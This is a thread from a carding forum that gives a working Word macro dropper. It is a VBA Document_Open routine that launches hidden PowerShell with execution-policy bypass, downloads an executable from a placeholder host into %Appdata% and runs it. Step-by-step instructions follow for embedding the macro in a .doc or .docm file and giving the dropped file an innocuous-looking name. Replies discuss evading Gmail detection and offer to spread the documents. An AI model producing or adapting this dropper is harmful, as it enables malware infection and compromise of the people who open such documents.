Go Back   Carder.life > [en] International Forum > Hacking & Coding
Reload this Page Creating an undetectable .DOC macro exploit (2019)

CARDER.MARKET - CARDING FORUM FOR PROFESSIONAL CARDERS


Reply
 
Thread Tools Display Modes
  #1  
Old 01-01-2025, 01:49 PM
quickly's Avatar

quickly quickly is offline
Join Date: Dec 2022
Posts: 1
Default

This exploit will effect any machine using any version of word that has macros enabled. Examples are as follows: 2003, 2007, 2010, 2013, 2016, 365
Example Code:
Private Sub Document_Open() Shell ("cmd.exe /c powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://YourWebsite.com/YourStub.exe','%Appdata%\DroppedStub');&start %Appdata%\DroppedStub& exit") End Sub
In the first step we will be modifying the code above to make it execute your payload file. The first part you will need to alter is “http://YourWebsite.com/YourStub.exe“. You will be replacing this with the direct download link to your executable file. The next part will be “%Appdata%\DroppedStub” which the process/file name of your executable after it executes. For example you could name this “winapi“, “winservhost” or whatever you like. In this example we are using the appdata folder for dropping the file. This does not require administrative privileges and to maximize compatibility. Another alternative would be to use “%temp%“. You will need to change the name of droppedstub in two locations within the example code. Pay close attention to this.
In final stage of this exploit we will be creating the document. You will require any versions of microsoft word that has macros enabled. Once you have, launch word and create a new document. Head over to the view tab, click on macros and here you will find “View Macros“. Click on Create Macro and navigate to the “Project Explorer” tab on your left hand side. Click on your document, by default Project (Document1) and expand it to click on “Microsoft Word Objects“. Double click on “ThisDocument” here you will copy and paste the modified code you created in step 1. Now click Ctrl + S or save it, then close the entire Macro Editor / VBA Explorer window.
When a window pops up saying “The following project cannot be saved in a macro-free document” just simply click no and select any extension of your choice to save the document. Our team suggests using .doc or .docm.
Happy hacking!
  #2  
Old 01-01-2025, 02:28 PM
nustnasty88's Avatar

nustnasty88 nustnasty88 is offline
Join Date: Aug 2021
Posts: 0
Default

How much can u see this for me? You create the doc or pdf exploit and I spread
  #3  
Old 01-01-2025, 02:44 PM
Zaeer's Avatar

Zaeer Zaeer is offline
Junior Member
Join Date: Mar 2021
Posts: 7
Default

you need more steps to not get detected by gmail or virtual opening file
the start is good but you need more...
5 or 6 steps are needed to bypass detection.
peace
  #4  
Old 01-01-2025, 02:52 PM
FredW7's Avatar

FredW7 FredW7 is offline
Join Date: Mar 2024
Posts: 0
Default

I agree, more obfuscation could be done, but good stuff. Thanks for the code.
Reply

Tags
NULL

« Previous Thread | Next Thread »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is On
Forum Jump




All times are GMT. The time now is 08:37 AM.

Contact Us - Carder.life - Archive - Top